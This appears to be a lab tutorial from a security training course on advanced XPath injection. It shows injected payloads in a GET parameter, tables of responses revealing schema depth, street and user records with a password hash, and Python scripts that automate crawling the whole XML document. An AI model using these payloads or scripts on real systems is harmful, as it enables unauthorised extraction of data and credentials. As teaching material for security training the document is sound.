Injection Attacks
XPath - Advanced Data Exfiltration
Sometimes it is impossible to extract the entire XML document at once. Consider a web application that displays only the first five results of an XPath query. If we inject our previous payload so that the query returns the entire XML document, we can exfiltrate only the first five data points. We therefore need to modify our payload to iterate through the XML document manually and exfiltrate all data.
Advanced Data Exfiltration
For this section, we are working on a slightly modified version of the web application from the previous section that limits the number of results returned so that we cannot exfiltrate the entire XML document at once. To iterate through the XML schema, we must first determine the schema depth. We can achieve this by ensuring the original XPath query returns no results and appending a new query that gives us information about the schema depth. We set the search term in the parameter q to anything that does not return data, for instance, SOMETHINGINVALID. We can then set the parameter f to fullstreetname | /*[1]. This results in the following XPath query:
/a/b/c[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | /*[1]
The subquery /*[1] starts at the document root /, moves one node down the node tree due to the wildcard *, and selects the first child due to the predicate [1]. Thus, this subquery selects the document root's first child, the document root element node. Since the document root element node has multiple child nodes, it is of the data type array in PHP, which we can confirm when analyzing the response. The web application expects a string but receives an array and is thus unable to print the results, resulting in an empty response.
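As a minimal sketch of how such a request could be assembled, the following Python snippet builds the value of the f parameter from a list of position predicates and URL-encodes both parameters. Only the parameter names q and f and the payload format come from the text above; the base URL and the helper names build_f and build_url are hypothetical.

```python
from urllib.parse import urlencode

# Hypothetical target URL; replace with the address of the spawned lab target.
BASE_URL = "http://target.example/index.php"


def build_f(positions, field="fullstreetname"):
    """Return the value for f: the original field plus a union subquery.

    positions=[1, 2] yields 'fullstreetname | /*[1]/*[2]'.
    """
    subquery = "".join(f"/*[{p}]" for p in positions)
    return f"{field} | {subquery}"


def build_url(positions, q="SOMETHINGINVALID"):
    """Build the full GET URL with both parameters percent-encoded."""
    return f"{BASE_URL}?{urlencode({'q': q, 'f': build_f(positions)})}"


print(build_f([1]))  # fullstreetname | /*[1]
print(build_url([1]))
```

Encoding the payload matters because the pipe, slash, asterisk, and brackets all have to survive transport inside a query string.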

We can now determine the schema depth by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes. The results look like this (the q parameter remains the same as above for all requests):
| Value of the f GET parameter | Response |
|---|---|
| fullstreetname \| /*[1] | Nothing |
| fullstreetname \| /*[1]/*[1] | Nothing |
| fullstreetname \| /*[1]/*[1]/*[1] | Nothing |
| fullstreetname \| /*[1]/*[1]/*[1]/*[1] | 01ST ST |
| fullstreetname \| /*[1]/*[1]/*[1]/*[1]/*[1] | No Results! |
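The probing loop behind this table can be sketched in Python. To keep the example runnable offline, the target is replaced by a dictionary of canned responses copied from the table, with an empty string standing for the empty response. The names simulated_oracle and find_depth are illustrative, and a real oracle would send the HTTP request instead.

```python
NO_RESULTS = "No Results!"

# Canned responses copied from the table above; an empty string stands for
# the empty response ("Nothing"). This dictionary only simulates the target.
CANNED = {
    "fullstreetname | /*[1]": "",
    "fullstreetname | /*[1]/*[1]": "",
    "fullstreetname | /*[1]/*[1]/*[1]": "",
    "fullstreetname | /*[1]/*[1]/*[1]/*[1]": "01ST ST",
    "fullstreetname | /*[1]/*[1]/*[1]/*[1]/*[1]": NO_RESULTS,
}


def simulated_oracle(f_value):
    """Stand-in for the HTTP request: map an f payload to a response body."""
    return CANNED.get(f_value, NO_RESULTS)


def find_depth(oracle, prefix="/*[1]", max_depth=20):
    """Append /*[1] until the response contains data; return (depth, value)."""
    path = prefix
    for _ in range(max_depth):
        response = oracle(f"fullstreetname | {path}")
        if response == NO_RESULTS:
            return None  # walked past the leaves without seeing data
        if response:  # non-empty and not the error marker: leaf text
            return path.count("/*["), response
        path += "/*[1]"
    return None


print(find_depth(simulated_oracle))  # (4, '01ST ST')
```

Passing a different prefix, such as /*[1]/*[2], would probe another branch of the document in the same way.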
From the above results, we can deduce that the schema depth for the street data is 4.

This allows us to start exfiltrating data by increasing the position in the last predicate until no more data can be retrieved:
| Value of the f GET parameter | Response |
|---|---|
| fullstreetname \| /*[1]/*[1]/*[1]/*[1] | 01ST ST |
| fullstreetname \| /*[1]/*[1]/*[1]/*[2] | 01ST |
| fullstreetname \| /*[1]/*[1]/*[1]/*[3] | ST |
| fullstreetname \| /*[1]/*[1]/*[1]/*[4] | No Results! |
We successfully exfiltrated information about the first street in the data set. The three values seem to be the long street name, the short street name, and a street type. We can thus fill in some of the placeholders of the XML schema from the previous section. However, remember that we still do not know the exact node names. We are just trying to create an overview of the structure of the XML document:
<a>
  <b>
    <street>
      <fullstreetname>01ST ST</fullstreetname>
      <streetname>01ST</streetname>
      <street_type>ST</street_type>
    </street>
  </b>
</a>
We can now extract information about the second street in the data set by incrementing the second to last position predicate in our injected payload like so:
| Value of the f GET parameter | Response |
|---|---|
| fullstreetname \| /*[1]/*[1]/*[2]/*[1] | 02ND AVE |
| fullstreetname \| /*[1]/*[1]/*[2]/*[2] | 02ND |
| fullstreetname \| /*[1]/*[1]/*[2]/*[3] | AVE |
| fullstreetname \| /*[1]/*[1]/*[2]/*[4] | No Results! |
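Incrementing the last predicate for each record, then the second to last predicate for the next record, amounts to two nested loops. The sketch below replays the responses from the two street tables. It assumes that every payload not listed returns "No Results!", which is a property of this simulation and not necessarily of the real target. The function name dump_records is hypothetical.

```python
NO_RESULTS = "No Results!"

# Responses taken from the two street tables above; every other payload is
# assumed to return "No Results!" in this simulation.
CANNED = {
    "/*[1]/*[1]/*[1]/*[1]": "01ST ST",
    "/*[1]/*[1]/*[1]/*[2]": "01ST",
    "/*[1]/*[1]/*[1]/*[3]": "ST",
    "/*[1]/*[1]/*[2]/*[1]": "02ND AVE",
    "/*[1]/*[1]/*[2]/*[2]": "02ND",
    "/*[1]/*[1]/*[2]/*[3]": "AVE",
}


def simulated_oracle(f_value):
    """Stand-in for the HTTP request: look up the subquery after ' | '."""
    path = f_value.split(" | ", 1)[1]
    return CANNED.get(path, NO_RESULTS)


def dump_records(oracle, parent="/*[1]/*[1]", limit=1000):
    """Collect the fields of every record below parent, one request each."""
    records = []
    for record_idx in range(1, limit + 1):
        fields = []
        for field_idx in range(1, limit + 1):
            payload = f"fullstreetname | {parent}/*[{record_idx}]/*[{field_idx}]"
            response = oracle(payload)
            if response == NO_RESULTS:
                break  # no more fields in this record
            fields.append(response)
        if not fields:
            break  # the record itself does not exist, so we are done
        records.append(fields)
    return records


print(dump_records(simulated_oracle))
# [['01ST ST', '01ST', 'ST'], ['02ND AVE', '02ND', 'AVE']]
```

Each record costs one extra request for the field that no longer exists, and the whole run ends with one extra request for the record that no longer exists.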
We can do this until we have exfiltrated information about all streets. However, since we are not interested in streets, let us see if the XML document contains other data sets. Incrementing the first position predicate in the payload makes little sense, as this is the document root, and valid XML documents only contain a single document root. However, we can alter the second position predicate to find additional data sets within the XML document. Remember that we need to determine the schema depth again, as it might differ from the depth of the streets data set. To illustrate this, consider the following sample XML document:
<dataset>
  <streets>
    <street>
      <fullstreetname>01ST ST</fullstreetname>
      <streetname>01ST</streetname>
      <street_type>ST</street_type>
    </street>
  </streets>
  <users>
    <group name="users">
      <user>
        <username>test</username>
        <password>test</password>
      </user>
    </group>
    <group name="admins">
      <user>
        <username>admin</username>
        <password>admin</password>
      </user>
    </group>
  </users>
</dataset>
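To make the difference between the two data sets in this sample document concrete, the following sketch parses it locally with Python's xml.etree.ElementTree and follows the first child at every level, which mirrors a chain of /*[1] steps. The helper first_child_chain is hypothetical and runs against the local sample only, not against the target.

```python
import xml.etree.ElementTree as ET

SAMPLE = """
<dataset>
  <streets>
    <street>
      <fullstreetname>01ST ST</fullstreetname>
      <streetname>01ST</streetname>
      <street_type>ST</street_type>
    </street>
  </streets>
  <users>
    <group name="users">
      <user><username>test</username><password>test</password></user>
    </group>
    <group name="admins">
      <user><username>admin</username><password>admin</password></user>
    </group>
  </users>
</dataset>
"""


def first_child_chain(root, dataset_pos):
    """Follow /*[1]/*[dataset_pos]/*[1]/... down to the first leaf."""
    node = list(root)[dataset_pos - 1]
    names = [root.tag, node.tag]
    while len(node):  # len() counts child elements
        node = node[0]
        names.append(node.tag)
    return names


root = ET.fromstring(SAMPLE)
for pos in (1, 2):
    chain = first_child_chain(root, pos)
    print(len(chain), "/" + "/".join(chain))
# 4 /dataset/streets/street/fullstreetname
# 5 /dataset/users/group/user/username
```

The first leaf under streets is reached after four steps and the first leaf under users after five, one step below the street and user nodes respectively.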
When querying the above XML document, the street nodes are at depth 3: /dataset/streets/street. However, the user nodes are at depth 4: /dataset/users/group/user. Thus, the depth is different, and we must determine it again to exfiltrate the users. We can determine the depth using the following parameter values. Since we are targeting the second data set in the XML document, we need to use /*[1]/*[2] as a starting point:
| Value of the f GET parameter | Response |
|---|---|
| fullstreetname \| /*[1]/*[2] | Nothing |
| fullstreetname \| /*[1]/*[2]/*[1] | Nothing |
| fullstreetname \| /*[1]/*[2]/*[1]/*[1] | Nothing |
| fullstreetname \| /*[1]/*[2]/*[1]/*[1]/*[1] | htb-stdnt |
| fullstreetname \| /*[1]/*[2]/*[1]/*[1]/*[1]/*[1] | No Results! |
We can see that the schema depth is 5. Furthermore, we seem to have exfiltrated a username. Just like we did with the streets data before, we can exfiltrate all user data by incrementing the last position predicate:
| Value of the f GET parameter | Response |
|---|---|
| fullstreetname \| /*[1]/*[2]/*[1]/*[1]/*[1] | htb-stdnt |
| fullstreetname \| /*[1]/*[2]/*[1]/*[1]/*[2] | 295362c2618a05ba3899904a6a3f5bc0 |
| fullstreetname \| /*[1]/*[2]/*[1]/*[1]/*[3] | HackTheBox Academy Student Account |
| fullstreetname \| /*[1]/*[2]/*[1]/*[1]/*[4] | No Results! |
From the data we exfiltrated, we seem to have leaked a user object consisting of a username, password hash, and description. We can now iteratively increment the position indices from right to left, just like we did with the street data set, to exfiltrate all users.
Note: To exfiltrate an entire XML document, it makes sense to implement a simple script that does the exfiltration for us.
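One possible shape for such a script is a depth-first walk that treats the three observed responses as an oracle: "No Results!" means the node does not exist, an empty response means the node has children, and anything else is leaf text. The sketch below is an assumption-laden outline, not a finished tool. The function http_oracle, its base_url argument, and the caller-supplied parse function that extracts the result from the page are all hypothetical. The demo runs against a local simulator built from a shortened version of the sample document, not against the target.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlencode
from urllib.request import urlopen

NO_RESULTS = "No Results!"

SAMPLE = (
    "<dataset><streets><street>"
    "<fullstreetname>01ST ST</fullstreetname>"
    "<streetname>01ST</streetname><street_type>ST</street_type>"
    "</street></streets>"
    "<users><group name='users'><user>"
    "<username>test</username><password>test</password>"
    "</user></group></users></dataset>"
)


def http_oracle(f_value, base_url, parse):
    """Hypothetical live oracle: send q and f, then let parse() pull the
    result text out of the returned page (its layout is not known here)."""
    query = urlencode({"q": "SOMETHINGINVALID", "f": f_value})
    with urlopen(f"{base_url}?{query}") as resp:
        return parse(resp.read().decode())


def make_simulator(xml_text):
    """Build a local oracle that mimics the three response types."""
    root = ET.fromstring(xml_text)

    def oracle(f_value):
        path = f_value.split(" | ", 1)[1]
        positions = [int(p) for p in re.findall(r"/\*\[(\d+)\]", path)]
        if not positions or positions[0] != 1:
            return NO_RESULTS  # only one document root element exists
        node = root
        for pos in positions[1:]:
            children = list(node)
            if pos > len(children):
                return NO_RESULTS
            node = children[pos - 1]
        if len(node):
            return ""  # element with children: nothing is printed
        return (node.text or "").strip()

    return oracle


def crawl(oracle, path="/*[1]", limit=1000):
    """Return leaf text, a list of children, or None if path is missing."""
    response = oracle(f"fullstreetname | {path}")
    if response == NO_RESULTS:
        return None
    if response:
        return response
    children = []
    for pos in range(1, limit + 1):
        child = crawl(oracle, f"{path}/*[{pos}]", limit)
        if child is None:
            break
        children.append(child)
    return children


print(crawl(make_simulator(SAMPLE)))
# [[['01ST ST', '01ST', 'ST']], [[['test', 'test']]]]
```

Because every request selects a single node, the walk stays within the limit on returned results. One limitation of this sketch is that a leaf with empty text is indistinguishable from an element with children and shows up as an empty list.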